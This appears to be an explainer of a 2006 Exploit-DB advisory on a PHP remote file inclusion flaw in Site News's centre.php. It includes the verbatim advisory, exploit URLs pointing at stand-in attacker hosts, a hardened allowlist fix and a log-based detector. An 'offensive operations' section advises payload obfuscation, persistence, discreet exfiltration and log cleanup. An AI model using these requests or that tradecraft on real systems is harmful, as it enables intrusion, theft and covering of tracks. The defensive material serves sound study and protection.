Understanding Site News 'centre.php' Remote File Inclusion

What this paper is
This paper describes a critical vulnerability in a web application called "Site News". The vulnerability is a Remote File Inclusion (RFI) flaw, meaning an attacker can trick the web application into including and executing arbitrary files from a remote server. The paper provides a simple explanation of the flaw and an example of how to exploit it.
Simple technical breakdown
The core of the vulnerability lies in how the centre.php file handles a variable named $page.
- If $page is empty, it includes a default file, accueil.php.
- If $page is not empty, it appends .php to whatever $page contains and includes the result.
The problem is that the application does not validate or sanitize the value of $page. An attacker can supply a URL pointing at a file on their own server (e.g., http://attacker.com/malicious.txt) as the value of $page, and the application will then try to include http://attacker.com/malicious.txt.php. Because the attacker controls the contents of that remote file, any PHP code it contains is executed on the victim's server.
Complete code and payload walkthrough
The paper highlights a specific code snippet from centre.php:
<?
if (empty($page))
{
include("accueil.php");
}
else
{
include($page.".php");
}
?>
Let's break this down:
- <? ... ?>: This denotes a PHP code block.
- if (empty($page)): This checks whether the variable $page is empty (i.e., it has no value or is set to NULL).
- include("accueil.php");: If $page is empty, the script includes the local file accueil.php. This is the default behavior.
- else: If $page is not empty, the code inside this block executes.
- include($page.".php");: This is the vulnerable part. It takes the value of $page, concatenates it with the string .php, and then attempts to include that file.
Example exploitation scenario:
The paper provides an example: http://www.victime.com/(path)/centre.php?page=http://attacker
Mapping of code fragment to practical purpose:
- if (empty($page)): Defines the default behavior when no specific page is requested.
- include("accueil.php");: Executes the default page.
- else { include($page.".php"); }: This is the core of the vulnerability. It allows external input to dictate which file is included, leading to RFI if the input is a remote URL.
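To make the walkthrough above concrete, and to show what the input-validation fix from the defensive lessons looks like in practice, here is an added example (it is not code from the paper or from the Site News project). It places the paper's include logic beside a hardened resolver that maps the request value onto a fixed allowlist and never uses it as a path. Two points of PHP background that the paper leaves implicit: the original script reads $page without touching $_GET, so the value only arrives from the query string when register_globals is on, which was the common configuration in 2006; and on PHP 5.2 and later, include() of a URL is gated by allow_url_include, a directive separate from allow_url_fopen. The page names news and archive and the host attacker.example are assumptions made up for the demonstration.

```php
<?php
// Added example, not the Site News project's code: the paper's vulnerable
// include logic beside a hardened, allowlist-based resolver.
declare(strict_types=1);

// Vulnerable form, exactly the decision the paper's centre.php makes.
// With register_globals on, $page arrives straight from ?page=..., and the
// concatenation turns any string, including a URL, into the include target.
function vulnerableTarget(string $page): string
{
    return empty($page) ? 'accueil.php' : $page . '.php';
}

// Hardened form: the request value is a key into a fixed table of files.
// 'news' and 'archive' are assumed page names used only for illustration.
const ALLOWED_PAGES = [
    'accueil' => 'accueil.php',
    'news'    => 'news.php',
    'archive' => 'archive.php',
];

function resolvePage(?string $page): string
{
    if ($page === null || $page === '') {
        return ALLOWED_PAGES['accueil'];
    }
    // Only a short bare identifier is accepted. A scheme ("http://"), a
    // slash, a dot or a NUL byte can never pass, so neither remote URLs,
    // stream wrappers nor ../ traversal reach the include.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return ALLOWED_PAGES['accueil'];
    }
    return ALLOWED_PAGES[$page] ?? ALLOWED_PAGES['accueil'];
}

// Defence in depth: report if the interpreter would follow URLs in include().
// allow_url_include gates include()/require() of URLs; allow_url_fopen gates
// fopen()/file_get_contents(). Both should be Off in php.ini for this app.
function remoteIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Demonstration on constructed inputs: the paper's RFI value, a traversal
// string and a stream wrapper all collapse to the default page.
$samples = ['', 'news', 'http://attacker.example/shell', '../../etc/passwd', 'php://input'];
foreach ($samples as $s) {
    printf("%-34s vulnerable -> %-36s hardened -> %s\n",
        var_export($s, true), vulnerableTarget($s), resolvePage($s));
}
if (remoteIncludeEnabled()) {
    fwrite(STDERR, "warning: allow_url_include is On; set it Off in php.ini\n");
}

// In the real script the hardened resolver replaces include($page.".php"):
//   include __DIR__ . '/' . resolvePage($_GET['page'] ?? null);
```

Run it from the command line with php to see each sample resolved both ways. The resolver reads the parameter explicitly from $_GET, so it does not depend on register_globals, and because the lookup table is the only source of file names, the concatenation that created the flaw no longer exists.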
Payload Explanation (Conceptual):
The paper doesn't provide explicit shellcode bytes. Instead, it describes the mechanism of the exploit. The "payload" in this context is the content of a remote file that the attacker hosts.
- Attacker hosts a malicious file: The attacker creates a file (e.g., shell.txt or backdoor.php) on their own web server. This file contains PHP code that, when executed, performs malicious actions (e.g., a web shell, command execution).
- Attacker crafts a request: The attacker sends a request to the vulnerable centre.php script, providing the URL of their malicious file as the $page parameter. For example: http://victim.com/site_news/centre.php?page=http://attacker.com/shell
- Vulnerable server processes the request: The centre.php script receives the request. Since $page is not empty, it executes include($page.".php");.
- Inclusion and execution: The script attempts to include http://attacker.com/shell.php. If the web server is configured to allow remote includes and the attacker's file is accessible and contains valid PHP, the code within http://attacker.com/shell.php will be executed on the victim's server.
Unknowns:
- The exact content of the malicious file (shell.txt or similar) is not specified in the paper.
- The specific configuration of the victim's web server (e.g., the allow_url_fopen setting in php.ini) that would enable remote includes is not detailed.
Practical details for offensive operations teams
- Required Access Level: Low. This is a web application vulnerability, exploitable via HTTP requests. No prior authentication or local access is typically required.
- Lab Preconditions:
  - A target web server running the vulnerable "Site News" application.
  - The allow_url_fopen directive must be enabled in the target server's php.ini configuration. This is crucial for PHP to be able to include remote files.
  - The attacker needs a web server to host the malicious payload.
- Tooling Assumptions:
  - A web browser for manual testing or crafting requests.
  - Tools like curl or Burp Suite for sending crafted HTTP requests.
  - A simple HTTP server (e.g., Python's http.server, Apache) to host the payload.
- Execution Pitfalls:
  - allow_url_fopen disabled: If this PHP setting is disabled on the target server, RFI will not work. The server will likely return an error or refuse to fetch the remote file.
  - Firewall/Network Restrictions: The target server might be configured to block outbound connections to arbitrary external IP addresses, preventing it from fetching the remote payload.
  - Input Sanitization (Partial): Some web servers or application frameworks might perform basic sanitization that could interfere with certain payload delivery methods. The paper implies a lack of sanitization for this specific vulnerability.
  - Path Traversal vs. RFI: This exploit is specifically RFI. If the application were vulnerable to Local File Inclusion (LFI), the technique would be different (e.g., using ../../etc/passwd).
  - Payload Extension: The exploit relies on appending .php. If the attacker's payload is not a .php file (e.g., it's a .txt file with PHP code), the server might try to include http://attacker.com/shell.txt.php, which would likely fail unless the attacker's server is configured to serve .txt files as PHP. A common workaround is to name the payload .php on the attacker's server and craft the request accordingly, or to use techniques that bypass the .php extension.
- Tradecraft Considerations:
  - Reconnaissance: Identify the target application and its version. Look for common web application vulnerabilities.
  - Payload Hosting: Ensure the payload is hosted on a reliable server that is accessible from the target. Use a domain that doesn't immediately raise suspicion if possible.
  - Obfuscation: For more advanced scenarios, consider obfuscating the payload to evade basic signature-based detection.
  - Post-Exploitation: Once code execution is achieved, immediately establish persistence and exfiltrate data discreetly. Clean up logs if possible.
Where this was used and when
- Context: This vulnerability was found in the "Site News" web application, a script likely used by small websites or individuals to manage news articles.
- Approximate Year: The exploit was published on November 23, 2006. Therefore, its exploitation would have occurred around this time and potentially in the years immediately following, until the vulnerability was patched by the vendor or the application fell out of use.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. All external data, especially data used in file operations (like include, require, fopen), must be rigorously validated and sanitized.
- Disable allow_url_fopen and allow_url_include: These PHP directives are often unnecessary for legitimate application functionality and are a primary enabler of RFI. Disabling them significantly reduces the attack surface.
- Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. This limits the damage an attacker can do even if they achieve code execution.
- Web Application Firewalls (WAFs): WAFs can help detect and block malicious requests containing patterns indicative of RFI attempts (e.g., URLs in GET parameters).
- Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions.
- Secure Coding Practices: Train developers on secure coding principles, including avoiding insecure functions and understanding common vulnerabilities like RFI and LFI.
- Network Segmentation and Egress Filtering: Restrict outbound network access from web servers to only necessary destinations. This can prevent a compromised web server from connecting to an attacker's C2 infrastructure.
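The WAF lesson above says RFI attempts are recognisable by URLs in GET parameters. The following added example (not part of the page or the paper) shows that detection as a log-review script: it parses combined-format access log lines, decodes the page parameter and flags values that carry a URL scheme, a stream wrapper, a traversal sequence or a NUL byte. The log lines are constructed for the example, and the host attacker.example and the paths are assumptions. The third constructed line is percent-encoded to show why the check must decode before matching.

```php
<?php
// Added example, not from the paper: flag requests to centre.php whose page
// parameter carries a remote URL, stream wrapper or traversal string.
declare(strict_types=1);

// Constructed access log lines (Apache combined format, abbreviated).
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [23/Nov/2006:10:01:02 +0000] "GET /site_news/centre.php?page=news HTTP/1.1" 200 1532
203.0.113.9 - - [23/Nov/2006:10:01:07 +0000] "GET /site_news/centre.php?page=http://attacker.example/shell HTTP/1.1" 200 88
203.0.113.9 - - [23/Nov/2006:10:01:09 +0000] "GET /site_news/centre.php?page=%68ttp%3A%2F%2Fattacker.example%2Fshell HTTP/1.1" 200 88
203.0.113.9 - - [23/Nov/2006:10:01:11 +0000] "GET /site_news/centre.php?page=../../../../etc/passwd%00 HTTP/1.1" 500 0
203.0.113.5 - - [23/Nov/2006:10:02:30 +0000] "GET /site_news/centre.php?page=archive HTTP/1.1" 200 2210
LOG;

// Parse one GET line into ip, timestamp, path, decoded query and status.
// Returns null for lines that are not GET requests in this format.
function parseLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP\/[\d.]+" (\d{3})/', $line, $m)) {
        return null;
    }
    $parts = parse_url($m[3]);
    $query = [];
    if (isset($parts['query'])) {
        parse_str($parts['query'], $query);   // percent-decodes the values
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'path'   => $parts['path'] ?? '',
        'query'  => $query,
        'status' => (int) $m[4],
    ];
}

// Classify a decoded page value. A second decode catches double-encoding.
function classifyPageValue(string $value): string
{
    $decoded = rawurldecode($value);
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $decoded)) {
        return preg_match('#^(https?|ftp)://#i', $decoded) ? 'remote-url' : 'stream-wrapper';
    }
    if (strpos($decoded, '..') !== false || strpos($decoded, "\0") !== false) {
        return 'traversal';
    }
    return 'clean';
}

// Walk the log and collect every request whose page value is not clean.
function findInclusionAttempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parseLine($line);
        if ($req === null || !isset($req['query']['page'])) {
            continue;
        }
        $verdict = classifyPageValue((string) $req['query']['page']);
        if ($verdict !== 'clean') {
            $hits[] = [
                'ip'   => $req['ip'],
                'time' => $req['time'],
                'kind' => $verdict,
                'page' => $req['query']['page'],
            ];
        }
    }
    return $hits;
}

foreach (findInclusionAttempts(SAMPLE_LOG) as $h) {
    printf("%s %-12s %-15s page=%s\n", $h['time'], $h['ip'], $h['kind'], $h['page']);
}
```

On the constructed input the script reports three hits from 203.0.113.9 (two remote-url, one traversal) and stays silent on the two legitimate page names. The same classifier is what a WAF rule encodes; running it over historical logs also answers the incident-response question of whether the flaw was exploited before the fix was deployed.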
ASCII visual (if applicable)
This vulnerability can be visualized as a direct path from external input to file inclusion.
   Attacker (browser / curl)
          |
          | 1. GET /centre.php?page=http://attacker.com/shell
          v
   +---------------------------+
   | Victim web server         |
   | centre.php:               |
   |   include($page.".php")   |
   +---------------------------+
          |
          | 2. PHP fetches http://attacker.com/shell.php
          |    (if allow_url_fopen enabled)
          v
   +---------------------------+
   | Attacker-controlled host  |
   | serves shell.php source   |
   +---------------------------+
          |
          | 3. returned PHP source is executed
          v
   +---------------------------+
   | Malicious code runs on    |
   | the victim server         |
   +---------------------------+
Source references
- Paper ID: 2833
- Paper Title: Site News - 'centre.php' Remote File Inclusion
- Author: DaDIsS
- Published: 2006-11-23
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2833
- Raw URL: https://www.exploit-db.com/raw/2833
Original Exploit-DB Content (Verbatim)
#===================================================================================#
#
# Site News => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Site News
# Url : http://dvmet.free.fr/script/site_news.zip
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation :
#
#
# The flaw resides in centre.php file that contain this code :
#
# <?
#
# if (empty($page))
# {
# include("accueil.php");
# }
# else
# {
# include($page.".php");
# }
#
# ?>
#
#===================================================================================#
#
# Example :
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#
# milw0rm.com [2006-11-23]